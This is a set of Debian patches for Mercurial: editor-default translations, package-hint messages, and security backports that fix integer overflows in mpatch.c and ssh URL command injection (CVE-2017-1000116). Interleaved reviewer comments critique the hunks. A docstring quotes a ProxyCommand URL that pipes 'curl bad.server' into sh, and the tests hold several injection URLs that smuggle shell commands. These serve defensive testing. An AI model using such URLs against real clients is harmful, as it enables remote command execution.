parecem ter sido insta msgid "checking commit editor...\n" msgstr "verificando editor para consolidação...\n" -msgid " No commit editor set and can't find vi in PATH\n" +msgid " No commit editor set and can't find sensible-editor in PATH\n" msgstr "" " Nenhum editor para consolidação configurado, e não foi possível encontrar " -"'vi' no PATH\n" +"'sensible-editor' no PATH\n" msgid " (specify a commit editor in your configuration file)\n" msgstr "" 
@@ -18837,10 +18837,12 @@ msgstr "" msgid "" "``editor``\n" -" The editor to use during a commit. Default is ``$EDITOR`` or ``vi``." +" The editor to use during a commit. Default is ``$EDITOR`` or\n" +" ``sensible-editor``." msgstr "" "``editor``\n" -" O editor usado durante um commit. O padrão é ``$EDITOR`` ou ``vi``." +" O editor usado durante um commit. O padrão é ``$EDITOR`` ou\n" +" ``sensible-editor``." msgid "" "``fallbackencoding``\n" @@ -20030,7 +20032,7 @@ msgid "" " editor it uses is determined by looking at the environment\n" " variables HGEDITOR, VISUAL and EDITOR, in that order. The first\n" " non-empty one is chosen. If all of them are empty, the editor\n" -" defaults to 'vi'." +" defaults to 'sensible-editor'." msgstr "" "EDITOR\n" " Algumas vezes o Mercurial precisa abrir em um editor um arquivo\n" @@ -20038,7 +20040,7 @@ msgstr "" " mensagens de consolidação. O editor usado é determinado pela\n" " consulta às variáveis de ambiente HGEDITOR, VISUAL e EDITOR,\n" " nessa ordem. O primeiro valor não vazio é escolhido. Se todos\n" -" estiverem vazios, o editor será o 'vi'." +" estiverem vazios, o editor será o 'sensible-editor'." msgid "" "PYTHONPATH\n" --- a/i18n/sv.po +++ b/i18n/sv.po @@ -9509,8 +9509,8 @@ msgstr " (mallar verkar vara inkorrekt i msgid "checking commit editor...\n" msgstr "kontrollerar arkiveringseditor...\n" -msgid " No commit editor set and can't find vi in PATH\n" -msgstr " Ingen arkiveringseditor satt och kan inte hitta vi i PATH\n" +msgid " No commit editor set and can't find sensible-editor in PATH\n" +msgstr " Ingen arkiveringseditor satt och kan inte hitta sensible-editor i PATH\n" msgid " (specify a commit editor in your configuration file)\n" msgstr " (specificera en arkiveringseditor i din konfigurationsfil)\n" 
@@ -14852,7 +14852,8 @@ msgstr "" msgid "" "``editor``\n" -" The editor to use during a commit. Default is ``$EDITOR`` or ``vi``." +" The editor to use during a commit. Default is ``$EDITOR`` or\n" +" ``sensible-editor``." msgstr "" msgid "" @@ -15564,7 +15565,7 @@ msgid "" " editor it uses is determined by looking at the environment\n" " variables HGEDITOR, VISUAL and EDITOR, in that order. The first\n" " non-empty one is chosen. If all of them are empty, the editor\n" -" defaults to 'vi'." +" defaults to 'sensible-editor'." msgstr "" msgid "" --- a/i18n/zh_CN.po +++ b/i18n/zh_CN.po @@ -5778,7 +5778,7 @@ msgstr "" msgid "Checking commit editor...\n" msgstr "" -msgid " No commit editor set and can't find vi in PATH\n" +msgid " No commit editor set and can't find sensible-editor in PATH\n" msgstr "" msgid " (specify a commit editor in your .hgrc file)\n" @@ -8666,7 +8666,7 @@ msgid "" " editor it uses is determined by looking at the environment\n" " variables HGEDITOR, VISUAL and EDITOR, in that order. The first\n" " non-empty one is chosen. If all of them are empty, the editor\n" -" defaults to 'vi'." +" defaults to 'sensible-editor'." msgstr "" msgid "" --- a/i18n/zh_TW.po +++ b/i18n/zh_TW.po @@ -6760,8 +6760,8 @@ msgstr "" msgid "Checking commit editor...\n" msgstr "檢查提交訊息編輯器...\n" -msgid " No commit editor set and can't find vi in PATH\n" -msgstr "沒有設定提交訊息編輯器,然後在PATH中也沒有vi\n" +msgid " No commit editor set and can't find sensible-editor in PATH\n" +msgstr "沒有設定提交訊息編輯器,然後在PATH中也沒有sensible-editor\n" msgid " (specify a commit editor in your configuration file)\n" msgstr "(在你的設定檔指明一個用來編輯提交訊息的編輯器)\n" @@ -9710,7 +9710,7 @@ msgid "" " editor it uses is determined by looking at the environment\n" " variables HGEDITOR, VISUAL and EDITOR, in that order. The first\n" " non-empty one is chosen. If all of them are empty, the editor\n" -" defaults to 'vi'." +" defaults to 'sensible-editor'." msgstr "" msgid "" --- a/mercurial/help/environment.txt 
+++ b/mercurial/help/environment.txt @@ -94,7 +94,7 @@ EDITOR editor it uses is determined by looking at the environment variables HGEDITOR, VISUAL and EDITOR, in that order. The first non-empty one is chosen. If all of them are empty, the editor - defaults to 'vi'. + defaults to 'sensible-editor'. PYTHONPATH This is used by Python to find imported modules and may need to be --- a/mercurial/help/config.txt +++ b/mercurial/help/config.txt @@ -1154,7 +1154,8 @@ User interface controls. Print debugging information. True or False. Default is False. ``editor`` - The editor to use during a commit. Default is ``$EDITOR`` or ``vi``. + The editor to use during a commit. Default is ``$EDITOR`` or + ``sensible-editor``. ``fallbackencoding`` Encoding to try if it's not possible to decode the changelog using --- a/i18n/ro.po +++ b/i18n/ro.po @@ -7722,7 +7722,7 @@ msgstr "" msgid "Checking commit editor...\n" msgstr "Se verifică editorul pentru commit...\n" -msgid " No commit editor set and can't find vi in PATH\n" +msgid " No commit editor set and can't find sensible-editor in PATH\n" msgstr "" msgid " (specify a commit editor in your configuration file)\n" @@ -11925,7 +11925,8 @@ msgstr "" msgid "" "``editor``\n" -" The editor to use during a commit. Default is ``$EDITOR`` or ``vi``." +" The editor to use during a commit. Default is ``$EDITOR`` or\n" +" ``sensible-editor``." msgstr "" msgid "" @@ -12570,7 +12571,7 @@ msgid "" " editor it uses is determined by looking at the environment\n" " variables HGEDITOR, VISUAL and EDITOR, in that order. The first\n" " non-empty one is chosen. If all of them are empty, the editor\n" -" defaults to 'vi'." +" defaults to 'sensible-editor'." msgstr "" msgid "" --- a/i18n/ru.po +++ b/i18n/ru.po 
@@ -12019,8 +12019,8 @@ msgstr " (шаблоны, похоже, msgid "checking commit editor...\n" msgstr "проверка редактора сообщений фиксации...\n" -msgid " No commit editor set and can't find vi in PATH\n" -msgstr " Редактор сообщений не установлен и vi не доступен в PATH\n" +msgid " No commit editor set and can't find sensible-editor in PATH\n" +msgstr " Редактор сообщений не установлен и sensible-editor не доступен в PATH\n" msgid " (specify a commit editor in your configuration file)\n" msgstr " (задайте редактор сообщений в вашем конфиге)\n" @@ -18656,10 +18656,12 @@ msgstr "" msgid "" "``editor``\n" -" The editor to use during a commit. Default is ``$EDITOR`` or ``vi``." +" The editor to use during a commit. Default is ``$EDITOR`` or\n" +" ``sensible-editor``." msgstr "" "``editor``\n" -" Редактор, вызываемый при фиксации. По умолчанию ``$EDITOR`` or ``vi``." +" Редактор, вызываемый при фиксации. По умолчанию ``$EDITOR`` or\n" +" ``sensible-editor``." msgid "" "``fallbackencoding``\n" 
@@ -19832,14 +19834,14 @@ msgid "" " editor it uses is determined by looking at the environment\n" " variables HGEDITOR, VISUAL and EDITOR, in that order. The first\n" " non-empty one is chosen. If all of them are empty, the editor\n" -" defaults to 'vi'." +" defaults to 'sensible-editor'." msgstr "" "EDITOR\n" " Иногда требуется открыть текстовый файл в редакторе, чтобы.\n" " внести изменения, например для написания сообщения фиксации.\n" " Используемый редактор определяется переменными среды HGEDITOR,\n" " VISUAL и EDITOR, именно в таком порядке. Выбирается первая\n" -" непустая переменная. Если они все пусты, используется 'vi'." +" непустая переменная. Если они все пусты, используется 'sensible-editor'." msgid "" "PYTHONPATH\n" debian/patches/CVE-2018-13346.patch0000664000000000000000000000141313373604476013337 0ustar # HG changeset patch # User Augie Fackler # Date 1524924552 14400 # Node ID faa924469635512b72868b1552a1866a0f91db20 # Parent 1acfc35d478cdae60cf62c6f07fa6b6ad3070ea7 mpatch: ensure fragment start isn't past the end of orig (SEC) Caught by oss-fuzz fuzzer during development. This defect is OVE-20180430-0004 or CVE-2018-13346. --- a/mercurial/mpatch.c +++ b/mercurial/mpatch.c @@ -360,7 +360,8 @@ static int apply(char *buf, const char *orig, Py_ssize_t len, struct flist *l) char *p = buf; while (f != l->tail) { - if (f->start < last || f->end > len || last < 0) { + if (f->start < last || f->start > len || f->end > len || + last < 0) { if (!PyErr_Occurred()) PyErr_SetString(mpatch_Error, "invalid patch"); debian/patches/deb_specific__optional-dependencies0000664000000000000000000001575412261301466017646 0ustar Suggest Debian packages for some optional dependencies. --- a/hgext/bugzilla.py +++ b/hgext/bugzilla.py 
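Review bot: The widened guard in apply() carries no comment saying which invariant each clause protects, and it does not itself reject a fragment whose end lies before its start or whose len is negative. Those cases are presumably left to decode(), which this hunk does not show. A one-line comment above the condition would make that division explicit, for example `/* need last <= f->start <= len and f->end <= len; start <= end and len >= 0 are checked in decode() */`. If fragments rewritten elsewhere (combine(), say) can reach apply() without passing those decode() checks, adding `f->end < f->start ||` here is cheap. apply()'s body continues past the end of the hunk, so how start, end and len are used after the check is not visible.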
@@ -354,7 +354,8 @@ class bzmysql(bzaccess): import MySQLdb as mysql bzmysql._MySQLdb = mysql except ImportError, err: - raise util.Abort(_('python mysql support not available: %s') % err) + raise util.Abort(_('python mysql support not available: %s') % err + + _(' (try installing the %s package)') % 'python-mysqldb') bzaccess.__init__(self, ui) --- a/hgext/convert/bzr.py +++ b/hgext/convert/bzr.py @@ -44,7 +44,8 @@ class bzr_source(converter_source): # access bzrlib stuff bzrdir except NameError: - raise NoRepo(_('Bazaar modules could not be loaded')) + raise NoRepo(_('Bazaar modules could not be loaded') + + _(' (try installing the %s package)') % 'bzr') path = os.path.abspath(path) self._checkrepotype(path) --- a/hgext/convert/common.py +++ b/hgext/convert/common.py @@ -28,11 +28,12 @@ def decodeargs(s): class MissingTool(Exception): pass -def checktool(exe, name=None, abort=True): +def checktool(exe, name=None, abort=True, debname=None): name = name or exe if not util.findexe(exe): exc = abort and util.Abort or MissingTool - raise exc(_('cannot find required "%s" tool') % name) + raise exc(_('cannot find required "%s" tool') % name + + (debname and _(' (try installing the %s package)') % debname or '')) class NoRepo(Exception): pass --- a/hgext/convert/cvs.py +++ b/hgext/convert/cvs.py @@ -22,7 +22,7 @@ class convert_cvs(converter_source): if not os.path.exists(cvs): raise NoRepo(_("%s does not look like a CVS checkout") % path) - checktool('cvs') + checktool('cvs', debname='cvs') self.changeset = None self.files = {} --- a/hgext/convert/darcs.py +++ b/hgext/convert/darcs.py 
@@ -36,14 +36,15 @@ class darcs_source(converter_source, com if not os.path.exists(os.path.join(path, '_darcs')): raise NoRepo(_("%s does not look like a darcs repository") % path) - checktool('darcs') + checktool('darcs', debname='darcs') version = self.run0('--version').splitlines()[0].strip() if version < '2.1': raise util.Abort(_('darcs version 2.1 or newer needed (found %r)') % version) if "ElementTree" not in globals(): - raise util.Abort(_("Python ElementTree module is not available")) + raise util.Abort(_("Python ElementTree module is not available") + + _(" (try installing the %s package)") % 'python-celementtree') self.path = os.path.realpath(path) --- a/hgext/convert/git.py +++ b/hgext/convert/git.py @@ -79,7 +79,7 @@ class convert_git(converter_source): if not os.path.exists(path + "/objects"): raise NoRepo(_("%s does not look like a Git repository") % path) - checktool('git', 'git') + checktool('git', 'git', debname='git-core') self.path = path self.submodules = [] --- a/hgext/convert/gnuarch.py +++ b/hgext/convert/gnuarch.py @@ -42,7 +42,8 @@ class gnuarch_source(converter_source, c if util.findexe('tla'): self.execmd = 'tla' else: - raise util.Abort(_('cannot find a GNU Arch tool')) + raise util.Abort(_('cannot find a GNU Arch tool') + + _(' (try installing the %s package)') % 'tla') commandline.__init__(self, ui, self.execmd) --- a/hgext/convert/monotone.py +++ b/hgext/convert/monotone.py @@ -66,7 +66,7 @@ class monotone_source(converter_source, self.files = None self.dirs = None - checktool('mtn', abort=False) + checktool('mtn', abort=False, debname='monotone') def mtnrun(self, *args, **kwargs): if self.automatestdio: --- a/hgext/convert/subversion.py +++ b/hgext/convert/subversion.py 
@@ -20,6 +20,7 @@ from cStringIO import StringIO from common import NoRepo, MissingTool, commit, encodeargs, decodeargs from common import commandline, converter_source, converter_sink, mapfile from common import makedatetimestamp +from common import checktool try: from svn.core import SubversionException, Pool @@ -237,16 +238,19 @@ class svn_source(converter_source): raise NoRepo(_("%s does not look like a Subversion repository") % url) if svn is None: - raise MissingTool(_('could not load Subversion python bindings')) + raise MissingTool(_('could not load Subversion python bindings') + + _(' (try installing the %s package)') % 'python-subversion') try: version = svn.core.SVN_VER_MAJOR, svn.core.SVN_VER_MINOR if version < (1, 4): raise MissingTool(_('Subversion python bindings %d.%d found, ' - '1.4 or later required') % version) + '1.4 or later required') % version + + _(' (try upgrading the %s package)') % 'python-subversion') except AttributeError: raise MissingTool(_('Subversion python bindings are too old, 1.4 ' - 'or later required')) + 'or later required') + + _(' (try upgrading the %s package)') % 'python-subversion') self.lastrevs = {} @@ -1025,6 +1029,8 @@ class svn_sink(converter_sink, commandli return self.join('hg-authormap') def __init__(self, ui, path): + checktool('svn', debname='subversion') + checktool('svnadmin', debname='subversion') converter_sink.__init__(self, ui, path) commandline.__init__(self, ui, 'svn') --- a/mercurial/hgweb/server.py +++ b/mercurial/hgweb/server.py @@ -207,7 +207,8 @@ class _httprequesthandleropenssl(_httpre import OpenSSL OpenSSL.SSL.Context except ImportError: - raise util.Abort(_("SSL support is unavailable")) + raise util.Abort(_("SSL support is unavailable") + + _(" (try installing the %s package)") % 'python-openssl') ctx = OpenSSL.SSL.Context(OpenSSL.SSL.SSLv23_METHOD) ctx.use_privatekey_file(ssl_cert) ctx.use_certificate_file(ssl_cert) 
@@ -248,7 +249,8 @@ class _httprequesthandlerssl(_httpreques import ssl ssl.wrap_socket except ImportError: - raise util.Abort(_("SSL support is unavailable")) + raise util.Abort(_("SSL support is unavailable") + + _(" (try installing the %s package)") % 'python-openssl') httpserver.socket = ssl.wrap_socket(httpserver.socket, server_side=True, certfile=ssl_cert, ssl_version=ssl.PROTOCOL_SSLv23) debian/patches/CVE-2018-13347-extras.patch0000664000000000000000000001463413373604466014654 0ustar Backport of six additional patches for CVE-2018-13347. # HG changeset patch # User Augie Fackler # Date 1525140822 14400 # Node ID 1ec4cb8cbc87004ffbeeb1b5d98acef04c38d59a # Parent faa924469635512b72868b1552a1866a0f91db20 mpatch: introduce a safeadd() helper to work around UB int overflow We're about to make extensive use of this. This change duplicates some stdbool.h portability hacks from cext/util.h. We should probably clean that up in the future, but we'll skip that for now in order to make security backports easier. # HG changeset patch # User Augie Fackler # Date 1525366460 14400 # Node ID b8b253aec9538b2614295f6ba4ecefe335ad8bf5 # Parent 1ec4cb8cbc87004ffbeeb1b5d98acef04c38d59a mpatch: introduce a safesub() helper as well Same reason as safeadd(). 
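Review bot: The hint added in `_httprequesthandlerssl` names the wrong package. This branch fails on `import ssl`, which is the Python standard-library module, whereas python-openssl supplies the separate `OpenSSL` module used by `_httprequesthandleropenssl` in the preceding hunk of this file. Installing python-openssl will not make `import ssl` succeed, so the message sends the user in the wrong direction. Either keep the upstream text, `raise util.Abort(_("SSL support is unavailable"))`, or say that the interpreter was built without the ssl module.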
# HG changeset patch # User Augie Fackler # Date 1525140911 14400 # Node ID 0b208c13781c18deae8fddb1dd63677f61fd64b5 # Parent b8b253aec9538b2614295f6ba4ecefe335ad8bf5 mpatch: fix UB in int overflows in gather() (SEC) # HG changeset patch # User Augie Fackler # Date 1525141213 14400 # Node ID 7f22ef3c0ee721da8a568613dff48a7051fad8d7 # Parent 0b208c13781c18deae8fddb1dd63677f61fd64b5 mpatch: fix UB integer overflows in discard() (SEC) # HG changeset patch # User Augie Fackler # Date 1525141386 14400 # Node ID 59837a16896da36d26e795881f4ba4454cb8ae41 # Parent 7f22ef3c0ee721da8a568613dff48a7051fad8d7 mpatch: avoid integer overflow in mpatch_decode (SEC) # HG changeset patch # User Augie Fackler # Date 1525141498 14400 # Node ID 9c5ced5276d6e7d54f7c3dadf5247b7ee98ec79c # Parent 59837a16896da36d26e795881f4ba4454cb8ae41 mpatch: avoid integer overflow in combine() (SEC) All the callers of this function can handle a NULL return, so that appears to be the "safe" way to report an error. --- a/mercurial/mpatch.c +++ b/mercurial/mpatch.c @@ -22,11 +22,21 @@ #define PY_SSIZE_T_CLEAN #include +#include #include #include #include "util.h" +/* VC9 doesn't include bool and lacks stdbool.h based on cext/util.h */ +#if defined(_MSC_VER) || __STDC_VERSION__ < 199901L +#define true 1 +#define false 0 +typedef unsigned char bool; +#else +#include +#endif + static char mpatch_doc[] = "Efficient binary patching."; static PyObject *mpatch_Error; 
@@ -74,6 +84,35 @@ static Py_ssize_t lsize(struct flist *a) return a->tail - a->head; } +/* add helper to add src and *dest iff it won't overflow */ +static inline bool safeadd(int src, int *dest) +{ + if ((src > 0) == (*dest > 0)) { + if (*dest > 0) { + if (src > (INT_MAX - *dest)) { + return false; + } + } else { + if (src < (INT_MIN - *dest)) { + return false; + } + } + } + *dest += src; + return true; +} + +/* subtract src from dest and store result in dest */ +static inline bool safesub(int src, int *dest) +{ + if (((src > 0) && (*dest < INT_MIN + src)) || + ((src < 0) && (*dest > INT_MAX + src))) { + return false; + } + *dest -= src; + return true; +} + /* move hunks in source that are less cut to dest, compensating for changes in offset. the last hunk may be split if necessary. */ @@ -83,18 +122,37 @@ static int gather(struct flist *dest, struct flist *src, int cut, int offset) int postend, c, l; while (s != src->tail) { - if (s->start + offset >= cut) + int soffset = s->start; + if (!safeadd(offset, &soffset)) + break; /* add would overflow, oh well */ + if (soffset >= cut) break; /* we've gone far enough */ - postend = offset + s->start + s->len; + postend = offset; + if (!safeadd(s->start, &postend) || + !safeadd(s->len, &postend)) { + break; + } if (postend <= cut) { /* save this hunk */ - offset += s->start + s->len - s->end; + int tmp = s->start; + if (!safesub(s->end, &tmp)) { + break; + } + if (!safeadd(s->len, &tmp)) { + break; + } + if (!safeadd(tmp, &offset)) { + break; /* add would overflow, oh well */ + } *d++ = *s++; } else { /* break up this hunk */ - c = cut - offset; + c = cut; + if (!safesub(offset, &c)) { + break; + } if (s->end < c) c = s->end; l = cut - offset - s->start; 
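Review bot: In gather() the split branch still computes `l = cut - offset - s->start;` with plain int arithmetic, even though a few lines above it the same `cut - offset` now goes through safesub(). The identical line survives in the discard() hunk that follows. Whether it can actually overflow depends on the ranges the earlier checks leave for cut, offset and s->start, which the hunk does not pin down, but for consistency it should use the helpers too: `l = cut; if (!safesub(offset, &l) || !safesub(s->start, &l)) break;`. Separately, every overflow path leaves the loop with `break`, so the caller gets a normal-looking return and cannot tell a truncated gather from a complete one; a comment stating why that is acceptable would help. Both functions continue beyond their hunks.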
@@ -128,16 +186,40 @@ static int discard(struct flist *src, int cut, int offset) int postend, c, l; while (s != src->tail) { - if (s->start + offset >= cut) + int cmpcut = s->start; + if (!safeadd(offset, &cmpcut)) { + break; + } + if (cmpcut >= cut) break; - postend = offset + s->start + s->len; + postend = offset; + if (!safeadd(s->start, &postend)) { + break; + } + if (!safeadd(s->len, &postend)) { + break; + } if (postend <= cut) { - offset += s->start + s->len - s->end; + /* do the subtraction first to avoid UB integer overflow + */ + int tmp = s->start; + if (!safesub(s->end, &tmp)) { + break; + } + if (!safeadd(s->len, &tmp)) { + break; + } + if (!safeadd(tmp, &offset)) { + break; + } s++; } else { - c = cut - offset; + c = cut; + if (!safesub(offset, &c)) { + break; + } if (s->end < c) c = s->end; l = cut - offset - s->start; @@ -179,8 +261,18 @@ static struct flist *combine(struct flist *a, struct flist *b) /* insert new hunk */ ct = c->tail; - ct->start = bh->start - offset; - ct->end = bh->end - post; + ct->start = bh->start; + ct->end = bh->end; + if (!safesub(offset, &(ct->start)) || + !safesub(post, &(ct->end))) { + /* It was already possible to exit + * this function with a return value + * of NULL before the safesub()s were + * added, so this should be fine. */ + lfree(c); + c = NULL; + goto done; + } ct->len = bh->len; ct->data = bh->data; c->tail++; @@ -191,7 +283,7 @@ static struct flist *combine(struct flist *a, struct flist *b) memcpy(c->tail, a->head, sizeof(struct frag) * lsize(a)); c->tail += lsize(a); } - +done: lfree(a); lfree(b); return c; 
@@ -215,10 +307,15 @@ static struct flist *decode(const char *bin, Py_ssize_t len) lt->start = getbe32(bin + pos); lt->end = getbe32(bin + pos + 4); lt->len = getbe32(bin + pos + 8); - lt->data = bin + pos + 12; - pos += 12 + lt->len; - if (lt->start > lt->end || lt->len < 0) + if (lt->start < 0 || lt->start > lt->end || lt->len < 0) break; /* sanity check */ + if (!safeadd(12, &pos)) { + break; + } + lt->data = bin + pos; + if (!safeadd(lt->len, &pos)) { + break; + } lt++; } debian/patches/CVE-2017-1000116.patch0000664000000000000000000003527713375313165013477 0ustar Description: fix for CVE-2017-1000116 (command injection on clients through malicious ssh URLs) This is a collapsed patch based on a series of 11 patches from upstream, backported to 3.7 by Atlassian, then backported to 2.2.2 by Debian. Changes were mostly trivial, apart from requiring the backport of the checksafessh function and tests output were adapted to match cosmetic changes between the versions. Author: Antoine Beaupré Bug-Debian: https://bugs.debian.org/871710 Origin: upstream, based on the Atlassian backport (0fe60a0:b143339) from https://bitbucket.org/atlassian/mercurial/commits/branch/sec-3.7 Forwarded: not-needed Last-Update: 2017-08-28 --- a/mercurial/posix.py +++ b/mercurial/posix.py @@ -9,6 +9,8 @@ from i18n import _ import encoding import os, sys, errno, stat, getpass, pwd, grp, socket, tempfile, unicodedata +from . import error + posixfile = open normpath = os.path.normpath samestat = os.path.samestat 
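Review bot: The three getbe32() reads at `bin + pos`, `+ 4` and `+ 8` in decode() run before anything in this hunk confirms that 12 bytes remain in the buffer. The loop header is outside the hunk; if it only requires `pos < len`, a truncated trailing record is read past the end of `bin`. A guard ahead of the reads, `if (pos > len - 12) break;`, would close that and also make the later `safeadd(12, &pos)` trivially safe. The hunk likewise sets `lt->data = bin + pos` without comparing `lt->len` to the bytes left, so that presumably rests on a check after the loop that is not shown.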
@@ -64,7 +66,13 @@ def parsepatchoutput(output_line): def sshargs(sshcmd, host, user, port): '''Build argument list for ssh''' args = user and ("%s@%s" % (user, host)) or host - return port and ("%s -p %s" % (args, port)) or args + if '-' in args[:1]: + raise error.Abort( + _('illegal ssh hostname or username starting with -: %s') % args) + args = shellquote(args) + if port: + args = '-p %s %s' % (shellquote(port), args) + return args def isexec(f): """check whether a file is executable""" --- a/mercurial/sshpeer.py +++ b/mercurial/sshpeer.py @@ -37,6 +37,8 @@ class sshpeer(wireproto.wirepeer): if u.scheme != 'ssh' or not u.host or u.path is None: self._abort(error.RepoError(_("couldn't parse location %s") % path)) + util.checksafessh(path) + self.user = u.user if u.passwd is not None: self._abort(error.RepoError(_("password in URL not supported"))) @@ -47,10 +49,7 @@ class sshpeer(wireproto.wirepeer): sshcmd = self.ui.config("ui", "ssh", "ssh") remotecmd = self.ui.config("ui", "remotecmd", "hg") - args = util.sshargs(sshcmd, - _serverquote(self.host), - _serverquote(self.user), - _serverquote(self.port)) + args = util.sshargs(sshcmd, self.host, self.user, self.port) if create: cmd = '%s %s %s' % (sshcmd, args, --- a/mercurial/subrepo.py +++ b/mercurial/subrepo.py @@ -1005,6 +1005,10 @@ class svnsubrepo(abstractsubrepo): # The revision must be specified at the end of the URL to properly # update to a directory which has since been deleted and recreated. args.append('%s@%s' % (state[0], state[1])) + + # SEC: check that the ssh url is safe + util.checksafessh(state[0]) + status, err = self._svncommand(args, failok=True) _sanitize(self._ui, self._path) if not re.search('Checked out revision [0-9]+.', status): 
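Review bot: The leading-dash test in the POSIX sshargs() is spelled `'-' in args[:1]`, while the Windows sshargs() in the same patch uses `args.startswith('-')`; the two do the same thing and the second says it directly. Suggest `if args.startswith('-'):` here so the two platform variants read alike. The docstring is still the one-line 'Build argument list for ssh', although the function now raises error.Abort and returns an already shell-quoted string. The sshpeer hunk below drops its own _serverquote() calls and so depends on that quoting, which makes it worth stating in the docstring.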
@@ -1209,6 +1213,9 @@ class gitsubrepo(abstractsubrepo): def _fetch(self, source, revision): if self._gitmissing(): + # SEC: check for safe ssh url + util.checksafessh(source) + source = self._abssource(source) self._ui.status(_('cloning subrepo %s from %s\n') % (self._relpath, source)) --- a/mercurial/util.py +++ b/mercurial/util.py @@ -1884,6 +1884,21 @@ def hasdriveletter(path): def urllocalpath(path): return url(path, parsequery=False, parsefragment=False).localpath() +def checksafessh(path): + """check if a path / url is a potentially unsafe ssh exploit (SEC) + + This is a sanity check for ssh urls. ssh will parse the first item as + an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path. + Let's prevent these potentially exploited urls entirely and warn the + user. + + Raises an error.Abort when the url is unsafe. + """ + path = _urlunquote(path) + if path.startswith('ssh://-') or path.startswith('svn+ssh://-'): + raise error.Abort(_('potentially unsafe url: %r') % + (path,)) + def hidepassword(u): '''hide user credential in a url string''' u = url(u) --- a/mercurial/windows.py +++ b/mercurial/windows.py @@ -9,6 +9,8 @@ from i18n import _ import osutil, encoding import errno, msvcrt, os, re, stat, sys, _winreg +from . import error + import win32 executablepath = win32.executablepath getuser = win32.getuser @@ -100,7 +102,14 @@ def sshargs(sshcmd, host, user, port): '''Build argument list for ssh or Plink''' pflag = 'plink' in sshcmd.lower() and '-P' or '-p' args = user and ("%s@%s" % (user, host)) or host - return port and ("%s %s %s" % (args, pflag, port)) or args + if args.startswith('-') or args.startswith('/'): + raise error.Abort( + _('illegal ssh hostname or username starting with - or /: %s') % + args) + args = shellquote(args) + if port: + args = '%s %s %s' % (pflag, shellquote(port), args) + return args def setflags(f, l, x): pass --- a/tests/test-clone.t +++ b/tests/test-clone.t 
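Review bot: In gitsubrepo._fetch() the check runs on `source` before `source = self._abssource(source)` rewrites it, so the string that is validated is not necessarily the string handed to git. _abssource() is not visible here; if it can resolve a relative source against the parent repository's URL, the resolved value is the one that matters. Calling `util.checksafessh(source)` again after the assignment, or moving it there, checks what is actually used. The check also sits inside `if self._gitmissing():`, so any later fetch path outside this hunk would need its own call.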
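Review bot: checksafessh() decides by string prefix, and only for the exact spellings `ssh://-` and `svn+ssh://-`. The same helper guards svn and git subrepo sources in this patch, and the hunk does not establish that those tools match schemes as strictly as these two prefixes do. A more robust form parses the value with the module's own `url` class and rejects any host or user that begins with `-` whenever the scheme names an ssh transport, compared case-insensitively. At minimum the docstring should say that the two prefixes are the complete set the callers rely on.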
@@ -621,3 +621,66 @@ re-enable perm to allow deletion #endif $ cd .. + +SEC: check for unsafe ssh url + + $ cat >> $HGRCPATH << EOF + > [ui] + > ssh = sh -c "read l; read l; read l" + > EOF + + $ hg clone 'ssh://-oProxyCommand=touch${IFS}owned/path' + abort: potentially unsafe url: 'ssh://-oProxyCommand=touch${IFS}owned/path' + [255] + $ hg clone 'ssh://%2DoProxyCommand=touch${IFS}owned/path' + abort: potentially unsafe url: 'ssh://-oProxyCommand=touch${IFS}owned/path' + [255] + $ hg clone 'ssh://fakehost|touch%20owned/path' + abort: no suitable response from remote hg! + [255] + $ hg clone 'ssh://fakehost%7Ctouch%20owned/path' + abort: no suitable response from remote hg! + [255] + + $ hg clone 'ssh://-oProxyCommand=touch owned%20foo@example.com/nonexistent/path' + abort: potentially unsafe url: 'ssh://-oProxyCommand=touch owned foo@example.com/nonexistent/path' + [255] + +#if windows + $ hg clone "ssh://%26touch%20owned%20/" --debug + running sh -c "read l; read l; read l" "&touch owned " "hg -R . serve --stdio" + sending hello command + sending between command + abort: no suitable response from remote hg! + [255] + $ hg clone "ssh://example.com:%26touch%20owned%20/" --debug + running sh -c "read l; read l; read l" -p "&touch owned " example.com "hg -R . serve --stdio" + sending hello command + sending between command + abort: no suitable response from remote hg! + [255] +#else + $ hg clone "ssh://%3btouch%20owned%20/" --debug + running sh -c "read l; read l; read l" ';touch owned ' 'hg -R . serve --stdio' + sending hello command + sending between command + abort: no suitable response from remote hg! + [255] + $ hg clone "ssh://example.com:%3btouch%20owned%20/" --debug + running sh -c "read l; read l; read l" -p ';touch owned ' 'example.com' 'hg -R . serve --stdio' + sending hello command + sending between command + abort: no suitable response from remote hg! 
+ [255] +#endif + + $ hg clone "ssh://v-alid.example.com/" --debug + running sh -c "read l; read l; read l" 'v-alid.example.com' 'hg -R . serve --stdio' + sending hello command + sending between command + abort: no suitable response from remote hg! + [255] + +We should not have created a file named owned - if it exists, the +attack succeeded. + $ if test -f owned; then echo 'you got owned'; fi --- a/tests/test-pull.t +++ b/tests/test-pull.t @@ -89,4 +89,26 @@ regular shell commands. $ URL=`python -c "import os; print 'file://localhost' + ('/' + os.getcwd().replace(os.sep, '/')).replace('//', '/') + '/../test'"` $ hg pull -q "$URL" +SEC: check for unsafe ssh url + + $ cat >> $HGRCPATH << EOF + > [ui] + > ssh = sh -c "read l; read l; read l" + > EOF + + $ hg pull 'ssh://-oProxyCommand=touch${IFS}owned/path' + abort: potentially unsafe url: 'ssh://-oProxyCommand=touch${IFS}owned/path' + [255] + $ hg pull 'ssh://%2DoProxyCommand=touch${IFS}owned/path' + abort: potentially unsafe url: 'ssh://-oProxyCommand=touch${IFS}owned/path' + [255] + $ hg pull 'ssh://fakehost|touch${IFS}owned/path' + abort: no suitable response from remote hg! + [255] + $ hg pull 'ssh://fakehost%7Ctouch%20owned/path' + abort: no suitable response from remote hg! + [255] + + $ [ ! -f owned ] || echo 'you got owned' + $ cd .. --- a/tests/test-push-r.t +++ b/tests/test-push-r.t 
